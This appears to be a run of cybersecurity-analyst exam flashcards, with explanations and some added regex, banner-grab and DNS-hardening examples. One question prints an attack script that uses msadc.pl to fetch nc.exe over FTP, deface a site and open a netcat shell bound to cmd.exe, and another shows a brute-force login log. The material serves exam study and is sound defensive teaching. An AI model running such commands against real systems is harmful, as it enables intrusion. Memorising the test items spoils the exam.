Q

Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability?

A. Heartbleed
B. Bluesmack
C. Carbanak
D. ROBOT Attack

A

A. Heartbleed

The Heartbleed bug is a serious vulnerability in the OpenSSL cryptographic software library. It was first disclosed in April 2014 and allowed anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromised the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. The Heartbleed bug in OpenSSL could have serious consequences, such as private key theft, making it a critical vulnerability. Carbanak is a sophisticated malware that was used in a series of targeted attacks against financial institutions from 2013 to 2015. The malware was able to steal millions of dollars from banks in over 30 countries. While the Carbanak attacks were significant, they involved targeted phishing and advanced persistent threats (APTs), not a widespread vulnerability like Heartbleed. The ROBOT attack is a type of man-in-the-middle attack that can be used to steal sensitive information from a TLS-protected connection. The attack works by exploiting a vulnerability in the RSA encryption algorithm that is used to secure TLS connections. The ROBOT Attack was a significant vulnerability affecting the RSA encryption algorithm, but it didn’t have the same level of impact or exploitability as Heartbleed. Bluesmack is a type of Denial-of-Service (DoS) attack that can be used to disable Bluetooth-enabled devices. The attack works by sending a specially crafted packet to the target device that causes it to crash or become unresponsive. While BlueSmack was a significant vulnerability affecting Bluetooth devices, it did not have the same global impact or exploitability as Heartbleed.

41
Q

Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach?

A. Trade secret information.
B. Protected health information.
C. Personally identifiable information.
D. Credit card information.

A

B. Protected health information.

Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPAA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.

42
Q

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?

A. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
B. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
C. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
D. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b

A

B. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

The correct option is \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b, which uses parentheses and “OR” operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square brackets indicates that any of the characters contained in the square brackets are matching criteria. Using the + operator indicates an allowance for one or more instances of the preceding element. In all cases, the period must have an escape (\) sequence preceding it, as the period is a reserved operator internal to REGEX.

43
Q

As an incident response manager, you’ve just concluded an incident where an attacker was able to breach your network by exploiting an unpatched vulnerability. In reviewing the incident, you realize that alerts regarding the vulnerability were overlooked due to a high volume of alerts. What should be your immediate next step to prevent similar occurrences?

A. Perform a root cause analysis.
B. Hire more incident response team members.
C. Ignore the incident since it was resolved.
D. Increase the alert volume to ensure nothing is missed.

A

A. Perform a root cause analysis.

A root cause analysis can help understand why important alerts were missed and guide improvements in your alert management system to prevent similar oversights in the future. While having more team members may help manage alerts, it does not address the underlying issue of alert fatigue or inadequate alert management. Increasing the alert volume may exacerbate the problem by contributing to alert fatigue, making it more difficult for important alerts to be noticed. Ignoring the issue won’t prevent similar incidents in the future. Learning from incidents is a crucial part of improving security posture.

44
Q

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp -s:tempfile\"");
$o=; print "Opening FTP connection...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit is indicated by this script:

A. Denial of Service exploit
B. Chained exploit
C. Buffer overflow exploit
D. SQL injection exploit

A

B. Chained exploit

The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly that occurs when a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.

45
Q

Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company’s risk response strategy?

A. Transference
B. Avoidance
C. Mitigation
D. Acceptance

A

C. Mitigation

Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

46
Q

Among the following vulnerabilities, which one was reported as a “Top 10” due to its common occurrence and the potential severity of its impact?

A. Poodle Attack
B. Cross-Site Scripting (XSS)
C. SolarWinds SUNBURST Attack
D. Spectre Attack

A

B. Cross-Site Scripting (XSS)

XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as user data theft, making this the correct answer. The Spectre attack was an impactful hardware vulnerability, but it’s not typically categorized as a top 10 vulnerability. While the Poodle Attack was significant and impacted SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability. The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability like XSS.

47
Q

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

A. Tokenization
B. Data masking
C. Data minimization
D. Anonymization

A

B. Data masking

Data masking can mean that all or part of a field’s contents is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

48
Q

A critical vulnerability has been identified in Kelly Nexis Analytic’s primary database system, which contains sensitive customer data. It is known that this vulnerability has been exploited in similar systems by attackers. How should the organization’s risk score for this vulnerability be set?

A. Not Applicable
B. High
C. Moderate
D. Low

A

B. High

Given the critical nature of the vulnerability, the sensitive data involved, and the fact that the vulnerability has been exploited before, a high risk score would be appropriate. Given the critical nature of the vulnerability and the fact that it has been exploited in similar systems, a low risk score would be inappropriate. Although a moderate score is higher than low, the critical nature of the vulnerability and the fact that it has been exploited before warrant a higher risk score. Every identified vulnerability should be assigned a risk score to guide its management process, so “Not Applicable” is incorrect.

49
Q

Which type of control aims to minimize the impact of a security incident after it occurs?

A. Corrective control
B. Deterrent control
C. Preventative control
D. Detective control

A

A. Corrective control

Corrective controls are implemented to mitigate or limit the damage after a security incident has occurred. Detective controls are designed to discover or detect security incidents that have already occurred. Deterrent controls are designed to discourage potential attackers. Preventive controls are designed to prevent security incidents from occurring.

50
Q

In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent?

A. Adversary
B. Capability
C. Infrastructure
D. Victim

A

C. Infrastructure

In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack.

51
Q

Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format?

A. HyperText Markup Language (HTML)
B. Structured Threat Information Expression (STIX)
C. Python
D. Structured Query Language (SQL)

A

B. Structured Threat Information Expression (STIX)

STIX is a standardized language for representing and sharing threat intelligence. Python is a general-purpose programming language, not a framework for sharing threat intelligence. HTML is a language for creating web pages, not for sharing threat intelligence. SQL is a language for managing and manipulating databases, not for sharing threat intelligence.

52
Q

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?

A. Conduct a packet capture of data traversing the server network.
B. Conduct a service discovery scan on the network.
C. Conduct an OS fingerprinting scan across the network.
D. Manually review the syslog server’s logs.

A

C. Conduct an OS fingerprinting scan across the network.

By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually reviewing the syslog server’s logs would take too long and would not find servers that don’t send their logs to the syslog server. Conducting a packet capture would only allow you to find the servers actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not effectively identify which servers are running which operating systems. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate whether Linux or Windows is the underlying server operating system.

53
Q

According to the Center for Internet Security’s system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC?

A. Malware defenses.
B. Controlled use of administrative privileges.
C. Application software security.
D. Inventory of authorized/unauthorized devices.

A

C. Application software security.

Since the software development lifecycle (SDLC) is focused on building software applications, the best control category would be application software security. While all other documents hosted by the Center for Internet Security contain useful information, the application software security control is most likely to contain relevant information relating to best practices to implement in the SDLC.

54
Q

Due to new regulations, your organization’s CIO has the information security team institute a vulnerability management program. What framework would BEST support this program’s establishment?

A. SANS
B. SDLC
C. NIST
D. OWASP

A

C. NIST

NIST (National Institute of Standards and Technology) produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program’s establishment and provide a series of guidelines and best practices. SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). The SDLC is the software development lifecycle. It is a method for dividing programming projects into separate phases. The Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.

55
Q

What containment technique is the strongest possible response to an incident?

A. Enumeration
B. Isolating affected systems
C. Isolating the attacker
D. Segmentation

A

B. Isolating affected systems

Isolation involves removing an affected component from whatever larger environment it is a part of. This can be anything from disconnecting a server from the network after it has been the target of a DoS attack to placing an application in a sandbox virtual machine (VM) outside of the host environment it usually runs on. Segmentation-based containment achieves isolation of a host or group of hosts using network technologies and architecture: VLANs, routing/subnets, and firewall ACLs prevent the host or hosts from communicating outside the protected segment, but the compromised system keeps running, so malicious code can still execute and spread within the segment. Enumeration is the process of extracting user names, machine names, network resources, shares, and services from a system; it is a reconnaissance activity, not a containment technique. Isolating the attacker (for example, blocking their known IP addresses at the perimeter) would only stop their direct two-way communication with and control of the affected system. It is not the strongest possible response, since malicious code could still be running on the victimized machine and the attacker can simply return from different infrastructure.

56
Q

[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?

A. Conducting a port scan of 192.168.1.142.
B. Conducting a Denial of Service attack on 192.168.1.142.
C. Conducting a brute force login attempt of a remote service on 192.168.1.142.
D. Conducting a ping sweep of 192.168.1.142/24.

A

C. Conducting a brute force login attempt of a remote service on 192.168.1.142.

The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

57
Q

Which of the following is NOT considered a phase in the incident response cycle?

A. Notification and communication.
B. Detection and analysis.
C. Preparation.
D. Containment, eradication and recovery.

A

A. Notification and communication.

There are four phases to the incident response cycle: preparation; detection and analysis; containment, eradication and recovery; and post-incident activity. While you will conduct some notifications and communication during your incident response, that term is not one of the four defined phases.

58
Q

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?

A. Zone transfers
B. CNAME
C. DNSSEC
D. DNS registration

A

A. Zone transfers

Zone transfers provide an easy way to send all the DNS information (the complete zone file) from one DNS server to another, which is how a primary server keeps its secondary servers synchronized. An attacker who can request one receives every hostname and address in the zone in a single query, which makes it a valuable reconnaissance step against your organization. For this reason, most administrators restrict zone transfers to their authorized secondary servers and refuse them from everyone else. DNSSEC strengthens authentication in DNS using digital signatures based on public-key cryptography; it does not restrict who can read zone data. A CNAME (Canonical Name) record is a type of resource record in the Domain Name System (DNS) that specifies that one domain name is an alias of another, canonical, domain name. DNS registration is the process by which a domain owner reserves a domain name through a registrar and designates the name servers that are authoritative for it.
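As an added illustration (not from the original card), here is what restricting zone transfers looks like in a BIND named.conf. The first zone block is the weak setting, the second the corrected one. The zone name, file path, key name and secondary address are placeholders, and the TSIG secret shown as a placeholder must be generated with tsig-keygen.

```conf
// WEAK: any host that can reach TCP/53 may pull the whole zone (AXFR)
zone "example.com" {
    type primary;                  // "type master" on BIND releases before 9.16
    file "/etc/bind/db.example.com";
    allow-transfer { any; };
};

// HARDENED: only requests signed with the shared TSIG key are honoured,
// so a spoofed source address is not enough to obtain the zone
key "xfer-key" {
    algorithm hmac-sha256;
    secret "<base64 secret from: tsig-keygen xfer-key>";   // placeholder
};

zone "example.com" {
    type primary;
    file "/etc/bind/db.example.com";
    allow-transfer { key "xfer-key"; };   // authorised secondaries present this key
    also-notify { 192.0.2.2; };           // placeholder secondary address
};
```

From any host that is not in possession of the key, dig axfr example.com @ns1.example.com should then return "Transfer failed." rather than the zone contents. Run that check from outside the trusted set after every configuration change, and watch the name server's log for refused AXFR requests: a burst of them from a single source is exactly the reconnaissance the card describes.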

59
Q

Jeff has been contacted by an external security company and told that they had found a copy of his company’s proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?

A. Delete the repository.
B. Change the repository from public to private.
C. Investigate if the source code was downloaded.
D. Revaluate the organization’s information management policies.

A

B. Change the repository from public to private.

Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company’s ongoing business operations. Reevaluation of the company’s information management policies should be done, but this is not as time-critical as changing the repository’s public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.

60
Q

Consider the following REGEX search string:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following strings would NOT be included in the output of this search?

A. 1.2.3.4
B. 37.259.129.207
C. 001.02.3.40
D. 205.255.255.001

A

B. 37.259.129.207

The \b anchors require the match to start and end at a word boundary, so the pattern must match a complete dotted quad rather than a fragment inside a longer token. The REGEX is made up of four identical groups, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?), each of which matches one octet of an Internet Protocol version 4 address. Each group accepts 25 followed by a digit 0-5 (250-255), OR (|) 2 followed by a digit 0-4 and then any digit (200-249), OR an optional (?) leading 0 or 1 followed by one digit and an optional second digit (0-199, with leading zeros allowed). The groups are separated by \. because a bare period is a REGEX metacharacter that matches any single character; the backslash escape makes it match a literal dot. Together, the four groups accept every value from 0 to 255 in each position. Since 259 is outside the range 0-255, it is rejected: a string starting with 25 must end with a digit between 0 and 5 (25[0-5]), 2[0-4][0-9] requires a second digit of 0-4, and [01]?[0-9][0-9]? cannot consume three digits that begin with 2, so no alternative matches 259 and the following \. cannot be satisfied. Options A, C, and D use only octets in the range 0-255 (leading zeros such as 001 are accepted by [01]?[0-9][0-9]?), so all three would be matched. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answers first and see that they all look like IP addresses. Remember, grep and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.207 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!
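The pattern run over a few log lines, as an added example that is not part of the original card. It uses the four-octet pattern from the card with each dot escaped as \. and applies it with Python's re module; the log lines are constructed for the demonstration. It also shows a caveat the card does not: the \b anchors stop the pattern matching inside a longer word, but they do not stop it matching the first four octets of a longer dotted string, so for validation (as opposed to searching) you want a full-string match.

```python
import re

# One octet: 250-255 | 200-249 | 0-199 (leading zeros allowed). Same group as the card.
OCTET = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

# The card's pattern: four octets joined by escaped dots, anchored on word boundaries.
IPV4_RE = re.compile(r"\b" + OCTET + r"\." + OCTET + r"\." + OCTET + r"\." + OCTET + r"\b")

def find_ipv4(text):
    """Return every substring the card's pattern accepts, in the order grep -o would print them."""
    return [m.group(0) for m in IPV4_RE.finditer(text)]

def is_strict_ipv4(candidate):
    """Validation variant: the whole string must be one dotted quad, not merely contain one."""
    return IPV4_RE.fullmatch(candidate) is not None

def matches_per_line(text):
    """Map 1-based line number -> list of matches, i.e. what grep -n -o -E would report."""
    return {n: find_ipv4(line) for n, line in enumerate(text.splitlines(), 1)}

# Constructed sample log (not from the page); the SRC values are the card's four options.
SAMPLE_LOG = """\
Jan 12 03:14:07 fw kernel: DROP IN=eth0 SRC=1.2.3.4 DST=10.0.0.5
Jan 12 03:14:08 fw kernel: DROP IN=eth0 SRC=37.259.129.207 DST=10.0.0.5
Jan 12 03:14:09 fw kernel: ACCEPT IN=eth0 SRC=001.02.3.40 DST=205.255.255.001
Jan 12 03:14:10 fw sshd[912]: Failed password for root from 192.168.1.142 port 51234
"""

if __name__ == "__main__":
    for n, hits in matches_per_line(SAMPLE_LOG).items():
        print(n, hits)
    # Caveat: a longer dotted string still yields a hit on its first four octets.
    print(find_ipv4("10.0.0.1.5"), is_strict_ipv4("10.0.0.1.5"))
```

Line 2 yields only 10.0.0.5: 37.259.129.207 fails because no alternative in the second group can consume 259 and leave a dot for the following \. to match. Line 3 yields both addresses, leading zeros included. Run the same pattern with grep -E -o on a real log to pull candidate indicators out of the noise, then validate each candidate with the full-match form before acting on it.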

61
Q

In the 2017 Equifax breach, the credit reporting company itself had vast amounts of sensitive personal data of consumers exposed due to a flaw in their Apache Struts web-application software. In the context of the Diamond Model of Intrusion Analysis, who does Equifax represent?

A. Victim
B. Capability
C. Infrastructure
D. Adversary

A

A. Victim

In the Diamond Model of Intrusion Analysis, Equifax represents the Victim as their systems and data were targeted in the breach. The Adversary is the entity conducting the attack, not the target of the attack. Infrastructure refers to the physical and virtual resources used in the attack, not the targeted entity. Capability refers to the tools and techniques used in the attack, not the targeted entity.

62
Q

You are applying for a job at a cybersecurity firm. The application requests you enter your social security number, date of birth, and email address to conduct a background check as part of the hiring process. Which of the following types of information has you been asked to provide?

A. CUI
B. PHI
C. PII
D. IP

A

C. PII

Personally identifiable information (PII) is data used to identify, contact, or locate an individual. Information such as social security number (SSN), name, date of birth, email address, telephone number, street address, and biometric data is considered PII. Protected health information (PHI) refers to medical and insurance records, plus associated hospital and laboratory test results. Proprietary information or intellectual property (IP) is information created and owned by the company, typically about the products or services that they make or perform. Controlled Unclassified Information (CUI) is federal non-classified information that must be safeguarded by implementing a uniform set of requirements and information security controls directed at securing sensitive government information.

63
Q

During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony’s systems to erase data. Which phase of the Cyber Kill Chain does this represent?

A. Installation
B. Delivery
C. Reconnaissance
D. Actions and Objectives

A

A. Installation

The installation of the wiper malware Destover on Sony’s systems represents the Installation phase of the Cyber Kill Chain. Delivery is about transmitting the weaponized payload to the victim, not installing a payload. Actions and Objectives is when the attacker fulfills their intent, not installing a payload. Reconnaissance is about gathering information about the target system, not installing a payload.

64
Q

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company’s security controls. Which DNS assessment technique would be classified as active?

A. Using maltego
B. A whois query
C. A DNS forward or reverse lookup
D. A zone transfer

A

D. A zone transfer

A DNS zone transfer, also known by the DNS query type that requests it, AXFR, is a DNS transaction type. It is one of the mechanisms available for administrators to replicate DNS databases across a set of DNS servers. Requesting a zone transfer sends a query directly to the target's authoritative name server asking for its entire zone, which makes it an active technique and one that a properly configured server will refuse and log. Performing a whois query is a passive reconnaissance technique: it queries the registry databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system (and a range of other information), and never touches the target's own infrastructure. Forward and reverse DNS lookups resolve names to IP addresses and IP addresses to names; because they are ordinary queries that can be sent through public resolvers and are indistinguishable from normal traffic, they are generally treated as passive reconnaissance. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively, since it can acquire it from whois servers, public DNS resolvers, or even the email addresses and hostnames gathered by theHarvester.

65
Q

Which of the following is NOT a valid reason to conduct reverse engineering?

A. To determine how a piece of malware operates.
B. To commit industrial espionage.
C. To allow an attacker to spot vulnerabilities in an executable.
D. To allow the software developer to spot flaws in their source code.

A

D. To allow the software developer to spot flaws in their source code.

If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information as to how the malware propagates and what its primary directives are. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

66
Q

You’ve been tasked to improve the operational efficiency of your security team. One of the solutions you’ve proposed is to incorporate the use of plugins. How could plugins enhance your team’s operations?

A. By decreasing the number of tools used.
B. By increasing the workload on the team.
C. By replacing current tools.
D. By extending the capabilities of existing tools.

A

D. By extending the capabilities of existing tools.

Plugins are software components that add specific features to an existing software application, enabling customization and extension of capabilities without heavy coding. Plugins typically increase the functionality of existing tools rather than decreasing the number of tools used. Effective use of plugins should ideally reduce the workload on the team by automating tasks and increasing the efficiency of existing tools, not increase it. Plugins don’t typically replace existing tools, but rather, they add to or improve the functionality of those tools.

67
Q

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Based on these results, which of the following operating system is most likely being run by this workstation?

A. Ubuntu
B. Windows
C. macOS
D. CentOS

A

B. Windows

The workstation is most likely running a version of the Windows operating system. Port 135/tcp is the Microsoft RPC endpoint mapper, port 139/tcp is the NetBIOS session service, and port 445/tcp is SMB (file and printer sharing) running directly over TCP. Since Windows 2000, Windows systems have listened on these ports by default, so this combination, with everything else filtered, is a strong fingerprint for a Windows host even without an OS detection scan. Linux (Ubuntu, CentOS) or macOS hosts expose 139/445 only if SMB file sharing (Samba or the built-in macOS SMB server) has been deliberately enabled, and would not normally expose 135.

68
Q

The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, “You will regret firing me; just wait until Christmas!” He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for?

A. Adware
B. Worm
C. Trojan
D. Logic bomb

A

D. Logic bomb

A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met, such as a date being reached or an account disappearing from the directory. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the employee was fired.

69
Q

Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization’s data center?

A. Schedule scans to begin at the same time every day.
B. Schedule scans to run during periods of low activity.
C. Schedule scans to run during peak times to simulate performance under load.
D. Schedule scans to be conducted evenly throughout the day.

A

B. Schedule scans to run during periods of low activity.

For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.

70
Q

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?

A. telnet
B. ftp
C. netcat
D. wget

A

B. ftp

The ftp client speaks only the FTP protocol: it will display the greeting of an FTP server on port 21, but it cannot be pointed at a web server's port 80 or 443 to read the HTTP response headers, which is where a web server's banner (the Server: header) lives. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports, typically the software name and version. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet or netcat, which open a raw TCP connection to any port and let you type a request such as HEAD / HTTP/1.0 and read the reply, or wget, which prints the server's response headers when run with the -S option.
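What a banner grab against a web server actually does, as an added example that is not part of the original card: open a TCP connection, send a minimal HTTP request, and read back whatever the service announces. To keep it runnable offline, the block also starts a constructed stand-in web server on the loopback interface that answers with a fixed Apache-style header; the response text and the hostname/port are assumptions for the demonstration, not observations about any real host.

```python
import socket
import threading

def grab_banner(host, port, probe=b"HEAD / HTTP/1.0\r\n\r\n", timeout=3.0, max_bytes=1024):
    """Connect, send an optional probe, and return the first bytes the service sends back.

    HTTP servers say nothing until asked, hence the HEAD probe; services such as SSH or SMTP
    speak first, so pass probe=None for those and just read.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        chunks = []
        try:
            while sum(len(c) for c in chunks) < max_bytes:
                data = s.recv(max_bytes)
                if not data:          # peer closed the connection
                    break
                chunks.append(data)
        except socket.timeout:        # peer kept the connection open; use what we have
            pass
    return b"".join(chunks).decode("latin-1", errors="replace")

def parse_server_header(banner):
    """Pull the Server: header out of an HTTP response, or None if the server hides it."""
    for line in banner.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None

# Constructed response for the stand-in server (not captured from a real host).
FAKE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                 b"Server: Apache/2.4.41 (Ubuntu)\r\n"
                 b"Content-Length: 0\r\n\r\n")

def start_fake_http_server(response=FAKE_RESPONSE):
    """Bind a one-shot listener on 127.0.0.1 and return its port; it answers one client then exits."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(1024)            # consume the probe, then answer
            conn.sendall(response)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port

if __name__ == "__main__":
    port = start_fake_http_server()
    banner = grab_banner("127.0.0.1", port)
    print(banner)
    print("Server header:", parse_server_header(banner))
```

The same exchange by hand is nc -v host 80 (or telnet host 80) followed by typing HEAD / HTTP/1.0 and two carriage returns, or wget -S --spider http://host/ to have the headers printed for you. Note that a banner is a claim, not a proof: administrators can rewrite or remove the Server header, so treat the version string as a lead to confirm with a vulnerability scanner rather than as ground truth.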

71
Q

Which of the following policies should contain the requirements for removing a user’s access when an employee is terminated?

A. Data ownership policy.
B. Account management policy.
C. Data classification policy.
D. Data retention policy.

A

B. Account management policy.

Account management policies describe the account life cycle from creation through decommissioning. Data ownership policies describe how ownership information is created and used. Data classification policies describe the classification structure of the data in use by an organization. Retention policies describe what data will be maintained and for how long it will be retained.

72
Q

Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system?

A. Username and password.
B. Password and security question.
C. Fingerprint and retinal scan.
D. Smartcard and PIN.

A

D. Smartcard and PIN.

